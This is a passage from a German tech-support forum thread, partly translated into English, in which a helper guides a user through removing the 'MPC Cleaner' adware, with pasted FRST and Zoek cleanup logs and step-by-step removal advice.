2016-02-12 16:51 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll 2016-03-21 16:28 - 2016-02-12 16:51 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe 2016-03-21 16:28 - 2016-02-12 16:48 - 02244096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll 2016-03-21 16:28 - 2016-02-12 16:47 - 00897024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll 2016-03-21 16:28 - 2016-02-12 16:46 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll 2016-03-21 16:24 - 2016-02-08 23:05 - 20352512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2016-03-21 16:24 - 2016-02-08 22:34 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2016-03-21 16:24 - 2016-02-08 22:29 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll 2016-03-21 16:24 - 2016-02-08 22:10 - 04611072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2016-03-21 16:24 - 2016-02-08 22:05 - 25816576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2016-03-21 16:24 - 2016-02-08 22:03 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll 2016-03-21 16:24 - 2016-02-08 22:02 - 13012480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2016-03-21 16:24 - 2016-02-08 22:02 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2016-03-21 16:24 - 2016-02-08 22:01 - 02050560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2016-03-21 16:24 - 2016-02-08 21:43 - 02121216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2016-03-21 16:24 - 2016-02-08 20:27 - 02887680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2016-03-21 16:24 - 2016-02-08 20:26 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2016-03-21 16:24 - 2016-02-08 20:16 - 06052352 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2016-03-21 16:24 - 2016-02-08 20:14 - 00108544 _____ 
(Microsoft Corporation) C:\WINDOWS\system32\hlink.dll 2016-03-21 16:24 - 2016-02-08 20:13 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll 2016-03-21 16:24 - 2016-02-08 19:42 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll 2016-03-21 16:24 - 2016-02-08 19:37 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll 2016-03-21 16:24 - 2016-02-08 19:34 - 00798720 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2016-03-21 16:24 - 2016-02-08 19:33 - 14613504 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2016-03-21 16:24 - 2016-02-08 19:33 - 02123264 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2016-03-21 16:24 - 2016-02-08 19:19 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2016-03-21 16:24 - 2016-02-08 19:15 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll 2016-03-21 16:24 - 2016-02-08 19:07 - 01546752 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2016-03-21 16:24 - 2016-02-08 18:55 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2016-03-21 16:23 - 2016-02-08 22:39 - 00496640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2016-03-21 16:23 - 2016-02-08 22:28 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll 2016-03-21 16:23 - 2016-02-08 22:07 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll 2016-03-21 16:23 - 2016-02-08 21:39 - 01311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2016-03-21 16:23 - 2016-02-08 21:38 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2016-03-21 16:23 - 2016-02-08 19:51 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2016-03-21 16:19 - 2016-02-11 16:21 - 00869576 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:21 - 00678600 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\msvcp120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:20 - 00875720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:20 - 00536776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp120_clr0400.dll 2016-03-21 16:19 - 2016-02-05 16:59 - 07784960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2016-03-21 16:19 - 2016-02-05 16:55 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2016-03-21 16:19 - 2016-02-05 16:48 - 07075840 _____ (Microsoft Corporation) C:\WINDOWS\system32\glcndFilter.dll 2016-03-21 16:19 - 2016-02-05 16:47 - 05268480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glcndFilter.dll 2016-03-21 16:18 - 2016-02-03 22:37 - 01661576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2016-03-21 16:18 - 2016-02-03 22:36 - 01212248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2016-03-21 16:18 - 2016-02-03 17:09 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2016-03-21 16:18 - 2016-02-03 17:00 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll 2016-03-21 16:18 - 2016-02-03 17:00 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll 2016-03-21 16:13 - 2016-02-06 20:08 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll 2016-03-21 16:13 - 2016-02-05 21:07 - 00292696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMASF.DLL 2016-03-21 16:13 - 2016-02-05 21:07 - 00243032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMASF.DLL 2016-03-21 16:13 - 2016-02-05 17:03 - 15432704 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll 2016-03-21 16:13 - 2016-02-05 17:00 - 13318144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll 2016-03-21 16:13 - 2016-02-04 20:18 - 04174336 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys 2016-03-21 16:13 - 2016-02-04 20:18 - 00358912 _____ (Adobe Systems 
Incorporated) C:\WINDOWS\system32\atmfd.dll 2016-03-21 16:13 - 2016-02-04 20:12 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2016-03-21 16:13 - 2016-02-04 19:44 - 00301568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll 2016-03-21 16:13 - 2016-02-04 19:39 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2016-03-21 16:13 - 2016-02-04 19:24 - 00603648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll 2016-03-21 16:13 - 2016-02-04 19:02 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll 2016-03-21 16:13 - 2016-01-31 21:16 - 00148832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS 2016-03-09 09:51 - 2016-03-09 09:51 - 00000000 ____D C:\Users\Denny\AppData\Local\VirtualStore 2016-03-08 14:19 - 2016-03-21 15:58 - 00000000 ____D C:\Users\Denny\Desktop\bewerbung philipp 2016-03-08 14:00 - 2016-03-08 14:00 - 00137615 _____ C:\Users\Denny\Desktop\EPSON002.png.PDF 2016-03-08 13:19 - 2016-03-08 13:19 - 05404312 _____ (Avira Operations GmbH & Co. 
KG) C:\Users\Denny\Downloads\avira_de_av_56deb4d03eff9__ws.exe 2016-03-08 12:16 - 2016-03-08 12:16 - 00000000 ____D C:\Program Files (x86)\DATA BECKER 2016-03-08 12:16 - 1998-11-17 14:44 - 00328704 _____ (InstallShield Software Corporation ) C:\WINDOWS\IsUn0407.exe 2016-03-08 12:13 - 2016-03-08 12:13 - 01470472 _____ C:\Users\Denny\Downloads\PopUp Banner Blocker - CHIP-Installer.exe 2016-03-08 12:06 - 2016-03-29 18:44 - 00001231 _____ C:\Users\Denny\Desktop\Continue Last version Installation.lnk 2016-03-08 11:46 - 2016-03-08 11:59 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim(1).exe 2016-03-08 11:44 - 2016-03-08 11:46 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim.exe 2016-03-07 22:16 - 2016-03-07 22:16 - 00000000 ____D C:\Users\Denny\AppData\Local\3810282D-6C19-47B0-8283-5C6C29A7E108 2016-03-05 22:21 - 2016-03-05 22:21 - 00003728 _____ C:\WINDOWS\System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920} ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 
2016-03-29 19:04 - 2016-02-05 00:38 - 00000884 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job 2016-03-29 18:54 - 2015-11-01 22:59 - 00003596 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-1001 2016-03-29 18:53 - 2013-09-30 06:14 - 01776918 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2016-03-29 18:53 - 2013-09-30 05:56 - 00765582 _____ C:\WINDOWS\system32\perfh007.dat 2016-03-29 18:53 - 2013-09-30 05:56 - 00159366 _____ C:\WINDOWS\system32\perfc007.dat 2016-03-29 18:53 - 2013-08-22 15:36 - 00000000 ____D C:\WINDOWS\Inf 2016-03-29 18:49 - 2013-10-24 13:02 - 00000000 ___DO C:\Users\Denny\SkyDrive 2016-03-29 18:46 - 2013-08-22 16:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2016-03-29 18:44 - 2013-10-13 12:41 - 00001921 _____ C:\Users\Denny\Desktop\SonyEditor.lnk 2016-03-29 18:41 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\Globalization 2016-03-29 18:41 - 2013-08-22 15:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI 2016-03-29 18:20 - 2015-11-01 23:05 - 00001132 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\zc1h3r7o5m4e.lnk 2016-03-29 18:20 - 2014-12-24 23:20 - 00001058 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop Elements 13.lnk 2016-03-29 18:20 - 2014-12-24 23:20 - 00001052 _____ C:\Users\Public\Desktop\Adobe Photoshop Elements 13.lnk 2016-03-29 18:20 - 2014-07-11 21:30 - 00001321 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk 2016-03-29 18:20 - 2014-07-11 21:30 - 00001315 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk 2016-03-29 18:20 - 2014-05-19 22:09 - 00002213 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon.lnk 2016-03-29 18:20 - 2014-03-29 08:08 - 00001047 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Download Assistant.lnk 2016-03-29 18:20 - 2013-12-07 10:06 - 00001110 _____ C:\Users\Public\Desktop\Acer Portal.lnk 2016-03-29 18:20 - 2013-11-10 21:21 - 00001178 _____ 
C:\Users\Public\Desktop\Acer Remote Files.lnk 2016-03-29 18:20 - 2013-11-10 21:20 - 00001140 _____ C:\Users\Public\Desktop\Acer Docs.lnk 2016-03-29 18:20 - 2013-10-24 12:44 - 00001535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2016-03-29 18:20 - 2013-09-07 22:32 - 00000928 _____ C:\Users\Public\Desktop\EPSON Scan.lnk 2016-03-29 18:19 - 2016-02-19 13:56 - 00001454 _____ C:\Users\Denny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2016-03-29 18:17 - 2014-05-16 21:31 - 00000000 ____D C:\temp 2016-03-29 18:11 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\rescache 2016-03-29 12:51 - 2012-07-26 09:59 - 00000000 ____D C:\WINDOWS\CbsTemp 2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\GWX 2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\system32\GWX 2016-03-28 23:29 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\AppReadiness 2016-03-28 23:13 - 2013-09-07 18:10 - 00000000 ____D C:\WINDOWS\System32\Tasks\WPD 2016-03-28 23:10 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator 2016-03-22 03:13 - 2014-12-25 19:50 - 00000000 ____D C:\WINDOWS\system32\appraiser 2016-03-22 03:12 - 2013-09-09 14:33 - 00000000 ____D C:\WINDOWS\system32\MRT 2016-03-22 03:08 - 2013-09-09 14:33 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2016-03-22 00:21 - 2014-05-14 21:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2016-03-21 23:32 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps 2016-03-21 23:18 - 2014-03-22 21:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome 2016-03-21 23:15 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Common Files\System 2016-03-21 22:57 - 2016-01-28 10:48 - 00000000 ____D C:\Users\Denny\AppData\Local\CrashDumps 2016-03-21 22:22 - 2015-06-01 20:54 - 00000000 ____D C:\Program Files (x86)\Color Icons for Gmail 2016-03-21 18:50 - 2015-10-26 21:57 - 00000000 ____D 
C:\WINDOWS\Minidump 2016-03-21 18:16 - 2016-01-28 10:50 - 00000000 ____D C:\Users\Denny\AppData\Local\Tempfolder 2016-03-21 17:36 - 2013-08-22 16:44 - 00590976 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2016-03-21 17:17 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\FxsTmp 2016-03-21 16:11 - 2016-01-18 20:30 - 00718336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2016-03-21 16:11 - 2016-01-18 20:30 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2016-03-11 09:50 - 2013-09-15 13:17 - 00000000 ____D C:\Users\Denny\Documents\Rechnungen DS-KFZ 2016-03-09 18:38 - 2013-08-22 17:36 - 00000000 ___RD C:\WINDOWS\ToastData 2016-03-09 09:37 - 2013-09-30 05:59 - 00000000 ____D C:\Program Files\Windows Journal 2016-03-08 12:35 - 2016-02-05 00:36 - 00000000 ____D C:\Users\Denny\AppData\Local\Chromium 2016-03-08 12:08 - 2013-11-10 15:12 - 00267264 ___SH C:\Users\Denny\Desktop\Thumbs.db 2016-03-08 12:04 - 2013-10-24 13:25 - 00000000 ___DC C:\WINDOWS\Panther 2016-03-07 21:43 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\NDF ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2013-06-29 02:24 - 2013-06-29 02:24 - 0000000 ____H () C:\ProgramData\DP45977C.lfl 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLes.DAT 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLet.DAT 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLev.DAT Einige Dateien in TEMP: ==================== C:\Users\Denny\AppData\Local\Temp\avgnt.exe C:\Users\Denny\AppData\Local\Temp\libeay32.dll C:\Users\Denny\AppData\Local\Temp\msvcr120.dll C:\Users\Denny\AppData\Local\Temp\sqlite3.dll ==================== Bamital & volsnap ================= (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) 
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert C:\WINDOWS\explorer.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert C:\WINDOWS\system32\services.exe => Datei ist digital signiert C:\WINDOWS\system32\User32.dll => Datei ist digital signiert C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert LastRegBack: 2016-03-29 18:02 ==================== Ende von FRST.txt ============================
Malwarebytes moved 0 files to quarantine, even though there were more than 200 detections. Edited by pitu82 (29.03.2016 at 18:37) |
30.03.2016, 00:57 | #7 |
/// Malwareteam | MPC Cleaner cannot be deleted (malware) Step: 1 Malware has irreparably corrupted your Chrome browser. Please download Revo Uninstaller (alternatively, portable Revo Uninstaller) from here.
Attention: If your data is not synchronized via a Google account, back up your bookmarks and passwords beforehand if necessary! Then download it again and reset it directly after installation. Now you can use Chrome normally again. Step: 2 Download ZOEK (by Smeenk)
Step: 3 Please start FRST again, tick the box next to Addition and click Scan (Untersuchen). Please post the two text files that are created again. Do you still have any problems with your computer?
__________________ Regards, Rafael ~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~ |
30.03.2016, 13:56 | #8 |
| MPC Cleaner cannot be deleted (malware) I don't really have any other problems, thanks. However, I am wondering whether I should carry out the process I did with Chrome for Firefox and Explorer as well? I no longer have Chrome installed either, since I actually only use the other two. So should I also uninstall Firefox and Explorer with Revo and then reinstall them? Here are the results: zoek: Code:
ATTFilter Zoek.exe v5.0.0.1 Updated 31-December-2015 Tool run by Denny on 30.03.2016 at 12:59:49,48. Microsoft Windows 8.1 6.3.9600 x64 Running in: Normal Mode Internet Access Detected Launched: C:\Users\Denny\Downloads\zoek.exe [Scan all users] [Script inserted] ==== System Restore Info ====================== 30.03.2016 13:01:35 Zoek.exe System Restore Point Created Successfully. ==== Empty Folders Check ====================== C:\PROGRA~3\Freemake deleted successfully C:\PROGRA~3\{FE8D473A-6F06-4F99-B5F4-BED72B2A038C} deleted successfully C:\Users\Denny\AppData\Local\EmieBrowserModeList deleted successfully C:\Users\Denny\AppData\Local\EmieSiteList deleted successfully C:\Users\Denny\AppData\Local\EmieUserList deleted successfully C:\Users\Denny\AppData\Local\Nikon deleted successfully C:\Users\Denny\AppData\Local\VirtualStore deleted successfully ==== Deleting CLSID Registry Keys ====================== HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{11DA220F-A26C-45FE-B34-702230168E14} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{11DA220F-A26C-45FE-B34-702230168E14} deleted successfully 
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{11DA220F-A26C-45FE-B34-702230168E14} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12A9715F-1374-4705-B25E-29DC956A50D} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12A9715F-1374-4705-B25E-29DC956A50D} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12A9715F-1374-4705-B25E-29DC956A50D} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1AF180E5-6C8B-4315-B627-A69D1F81CFC} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1AF180E5-6C8B-4315-B627-A69D1F81CFC} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1AF180E5-6C8B-4315-B627-A69D1F81CFC} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F945903-D8EA-4AC9-864-058CE661FAD} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1F945903-D8EA-4AC9-864-058CE661FAD} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet 
Explorer\Low Rights\ElevationPolicy\{1F945903-D8EA-4AC9-864-058CE661FAD} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2F0EE67A-CF37-4AAB-8382-D1CBD493C4A} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2F0EE67A-CF37-4AAB-8382-D1CBD493C4A} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2F0EE67A-CF37-4AAB-8382-D1CBD493C4A} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{30472B66-664C-4260-90F9-5586D343EC3} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{30472B66-664C-4260-90F9-5586D343EC3} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{30472B66-664C-4260-90F9-5586D343EC3} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3F512EE1-FA3D-465E-B4BD-8DA35C3A6A3D} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3F512EE1-FA3D-465E-B4BD-8DA35C3A6A3D} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3F512EE1-FA3D-465E-B4BD-8DA35C3A6A3D} deleted successfully 
HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ACAC2AF-D14F-4536-9682-8FD09771FEA} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ACAC2AF-D14F-4536-9682-8FD09771FEA} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ACAC2AF-D14F-4536-9682-8FD09771FEA} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4D672C46-B192-4945-BD94-E1A3997A3AE} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4D672C46-B192-4945-BD94-E1A3997A3AE} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4D672C46-B192-4945-BD94-E1A3997A3AE} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5480CDFD-8128-4A10-8FC7-2765B9B9852} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5480CDFD-8128-4A10-8FC7-2765B9B9852} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5480CDFD-8128-4A10-8FC7-2765B9B9852} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low 
Rights\ElevationPolicy\{5A1CD7A0-9FAC-4C17-B74B-A87A529A3CC} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5A1CD7A0-9FAC-4C17-B74B-A87A529A3CC} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5A1CD7A0-9FAC-4C17-B74B-A87A529A3CC} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{713CEEB0-E88B-4A90-8E25-1F3332A09DCA} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{713CEEB0-E88B-4A90-8E25-1F3332A09DCA} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-1\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{713CEEB0-E88B-4A90-8E25-1F3332A09DCA} deleted successfully HKEY_USERS\S-1-5-21-1569062512-718196537-2772323438-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A73EBB32-C5B0-442D-9D9F-80D7B81FFE1} deleted successfully 